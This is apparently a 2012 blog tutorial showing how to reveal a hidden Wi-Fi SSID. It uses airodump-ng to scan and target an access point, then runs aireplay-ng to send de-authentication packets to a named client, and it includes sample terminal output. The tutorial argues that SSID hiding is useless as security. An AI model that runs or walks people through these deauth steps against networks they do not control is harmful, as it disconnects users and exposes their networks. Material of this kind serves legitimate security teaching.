Find Hidden SSID's

Known as security though obscurity many people may hide there ssid's from broadcasting. Just like mac address blocking this is a worthless form of protection. There is nothing secure about hiding your SSID. Its like the wizard hiding behind the curtain. It just does not add any value to your security and like mac address blocking it adds complication with no reward. Today I am going to show you how easy it is to reveal a hidden SSID using the aircrack-ng suite. First things first. Start airdump-ng by using the following command. Replace the interface with your own.

airodump-ng wlan1

The readout should be something like this.

CH  9 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09                                          
                                                                                                                                              
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                                                                                                 
 28:EF:01:34:64:91  -29       19        1    0   6  54e  WPA2 CCMP   PSK  linksys                            
 28:EF:01:35:34:85  -42       17        0    0   6  54e  WPA2 CCMP   PSK  <length:  6>                                                                                                                                                                 
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                                                                                                                     
 28:EF:01:35:34:85  28:EF:01:23:45:67  -57    0 - 1      0        1                                                     

As you can see from the devices found we have one with a hidden SSID. This hidden SSID is depicted as <length:  x> with x being the number of letters in the SSID. Some do not display this number. Honestly the length does not much matter to us. What we are interested in is the clients attached to that access point. You see all we have to do is de-authenticate a client and when that client re-authenticates it will send the SSID though the air allowing us to retrieve it. Lets run airodump-ng again and filter out everything but the access point in question with this command.

airodump-ng -c 6 --bssid 28:EF:01:35:34:85 wlan1

explanation of the switches are

-c = channel of target access point 
--bssid = MAC address from the target access point

This is what the airdump-ng readout should look like now. 

CH  6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09                                          
                                                                                                                                              
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                    
                                                                                                                                              
 28:EF:01:35:34:85  -42       17        0    0   6  54e  WPA2 CCMP   PSK  <length:  6>                    
                                                                                                                                              
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                        
                                                                                                                                              
 28:EF:01:35:34:85  28:EF:01:23:45:67  -57    0 - 1      0        1                                                    

Here we can see the target access point with one client attached. We now need to de-authenticate this client and see if we can get the SSID during the re authentication. 

Now open a new terminal window and leave airodump-ng running. 

Run this command in the new terminal. 

aireplay-ng -0 30 -a  28:EF:01:35:34:85 -c 28:EF:01:23:45:67 wlan1

This switches to this command are as follows

-0 = Attack mode 0= de-authentication (The number following this indicates the number of deauth packets.)
-a = Target access point mac address
-c = Target client mac address

Now switch back to the original terminal window that still has airodump-ng running. 

This is what it should now look like. 

CH  6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09                                          
                                                                                                                                              
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                    
                                                                                                                                              
 28:EF:01:35:34:85  -42       17        0    0   6  54e  WPA2 CCMP   PSK  hacked                           
                                                                                                                                              
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                        
                                                                                                                                              
 28:EF:01:35:34:85  28:EF:01:23:45:67  -57    0 - 1      0        1   hacked

As you can see we now know that the SSID for the target router is "hacked" 

If it does not work the first time try aireplay-ng again until it works. 

Share

Add comment

Comments do not require an account. Anyone is welcome and encouraged to leave a comment.

However, If you are a spammer all comments require admin approval so your wasting your time and mine.
No one will ever see it. Please stop posting spam.

 

Filtered HTML

  • Web page addresses and e-mail addresses turn into links automatically.
  • Allowed HTML tags: <a> <em> <strong> <cite> <blockquote> <code> <ul> <ol> <li> <dl> <dt> <dd>
  • Lines and paragraphs break automatically.

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
Image CAPTCHA
Enter the characters shown in the image.